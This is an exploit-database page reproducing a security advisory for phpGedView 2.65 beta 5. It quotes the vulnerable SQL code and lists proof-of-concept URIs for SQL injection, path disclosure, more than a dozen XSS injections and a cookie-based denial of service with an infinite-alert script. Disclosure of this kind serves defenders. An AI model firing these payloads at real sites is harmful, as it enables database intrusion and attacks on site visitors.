header-logo
Suggest Exploit
vendor:
phpGedView
by:
8.1
CVSS
HIGH
SQL Injection
89
CWE
Product Name: phpGedView
Affected Version From: <= 2.65 beta 5
Affected Version To: <= 2.65 beta 5
Patch Exists: NO
Related CWE:
CPE: phpgedview
Metasploit:
Other Scripts:
Platforms Tested:

phpGedView Multiple Vulnerabilities

The phpGedView project has multiple SQL injection vulnerabilities in the 'timeline.php' and 'placelist.php' files. These vulnerabilities are a result of input not being properly validated, allowing an attacker to execute arbitrary SQL queries. Specifically, the 'get_place_list()' function in the 'functions_mysql.php' file does not sanitize the $parent_id and $level variables before including them in the query. This can be exploited by an attacker to manipulate the SQL queries and potentially gain unauthorized access to the database.

Mitigation:

To mitigate these vulnerabilities, it is recommended to sanitize and validate all user input before using it in SQL queries. Additionally, implementing prepared statements or parameterized queries can help prevent SQL injection attacks. It is also advised to keep the software up to date with the latest patches and security updates.
Source

Exploit-DB raw data:

phpGedView Multiple Vulnerabilities

Vendor: phpGedView
Product: phpGedView
Version: <= 2.65 beta 5
Website: http://phpgedview.sourceforge.net


Description:
The phpGedView project parses GEDCOM 5.5 genealogy files and displays them on the Internet in a format similar to PAF. All it requires to run is a php enabled web server and a gedcom file. It is easily customizable for use on many different web sites. It is one of the top 10 most popular projects at SourceForge. 

SQL Injection Vulnerability:
phpGedView has a few files which are vulnerable to SQL injection. The vulnerable files are "timeline.php" and "placelist.php" The vulnerabilities are a result of input not being properly validated. The data given to these scripts are then executed by the "functions_mysql.php" file. As we can see below the $parent_id variable as well as the $level variable is passed directly into the query without being sanitized by the script at all in the "get_place_list()" function. 

//-- find all of the places
function get_place_list() {
global $numfound, $j, $level, $parent, $found;
global $GEDCOM, $TBLPREFIX, $placelist, $positions;

// --- find all of the place in the file
if ($level==0) $sql = "SELECT p_place FROM ".$TBLPREFIX."places WHERE p_level=0 
AND p_file='$GEDCOM' ORDER BY p_place";
else {
	$psql = "SELECT p_id FROM ".$TBLPREFIX."places WHERE p_level=".($level-1)
	." AND p_place LIKE '".$parent[$level-1]."' AND p_file='$GEDCOM' ORDER BY 
	p_place";
	$res = dbquery($psql);
	$row = mysql_fetch_row($res);
	$parent_id = $row[0];
	$sql = "SELECT p_place FROM ".$TBLPREFIX."places WHERE p_level=$level AND 
	p_parent_id=$parent_id AND p_file='$GEDCOM' ORDER BY p_place";
}
$res = dbquery($sql);
while ($row = mysql_fetch_row($res)) {
	$placelist[] = stripslashes($row[0]);
	$numfound++;
}
}

Below are some URI's which can be used to exploit the issue explained in the paragraph above. Also included is a URI that triggers a somewhat similar SQL vulnerability in the "timeline.php" script. 

/placelist.php?level=1[Evil_Query]
/placelist.php?level=1&parent[0]=[Evil_Query]
/placelist.php?level=2&parent[0]=&parent[1]=[Evil_Query]
/timeline.php?pids=[Evil_Query] 

Path Disclosure Vulnerability:
There are a decent number of ways an attacker could disclose the full path of the web server, thus aiding in the information gathering process preceding an attack. Below are a list of the vulnerable scripts and proof of concept URI's to reproduce the condition. 

/indilist.php?alpha=\&surname_sublist=\
/famlist.php?alpha=(&surname_sublist=yes&surname=\
/placelist.php?level=1&parent[Blah]=
/imageview.php?zoomval=blah
/imageview.php?filename=/
/timeline.php?pids[Blah]=
/clippings.php?action=add&id=Blah
/login.php?action=login
/login.php?&changelanguage=yes&NEWLANGUAGE=Blah
/gdbi.php?action=connect&username=Blah 

Cross Site Scripting:
I have found over a dozen instances of Cross Site Scripting in phpGedView, but there is probably more. The impact of these vulnerabilities are self explanatory; they allow code execution in the context of the browser of someone viewing the malicious URI. Below are examples of the numerous XSS vulns. 

/descendancy.php?pid=<iframe>
/index.php?rootid="><iframe>
/individual.php?pid="><iframe>
/login.php?url=/index.php?GEDCOM="><iframe>
/relationship.php?path_to_find="><iframe>
/relationship.php?path_to_find=0&pid1="><iframe>
/relationship.php?path_to_find=0&pid1=&pid2="><iframe>
/source.php?sid=<iframe>
/imageview.php?filename=<iframe>
/calendar.php?action=today&day=1&month=jan&year="><iframe>
/calendar.php?action=today&day=1&month=<iframe>
/calendar.php?action=today&day=<iframe>
/gedrecord.php?pid=<iframe>
/login.php?action=login&username="><iframe>
/login.php?&changelanguage=yes&NEWLANGUAGE=<iframe>
/gdbi_interface.php?action=delete&pid=<iframe> 

Denial Of Service:
It is also possible for an attacker to launch a DoS of sorts against a user who visits a certain URI. The vulnerability is in the language variable not being properly validated. If an attacker sends the following URI to a victim, they will not be able to access the phpGedView web site until they either clear their cookies, or manually reset the language settings by typing in a valid URI to reset the language back to something acceptable. The phpGedView website will not be able to be viewed by the victim until then. 

/index.php?&changelanguage=yes&NEWLANGUAGE=[Junk_Here] 

Or even one hundred million times more annoying is this :P 
/index.php?&changelanguage=yes&NEWLANGUAGE=<script>var i=1; while(i){alert(i);};</script> 

As I mentioned before though, it is possible to regain a normal session by manually typing in a value in the language variable that is acceptable to phpGedView. 

Solution:
These vulnerabilities have been addressed in the latest beta release. Users may obtain the latest beta version at 
http://sourceforge.net/project/showfiles.php?group_id=55456 

Credits:
James Bercegay of the GulfTech Security Research Team.

Navigation

Suggest Exploit

Services By CQR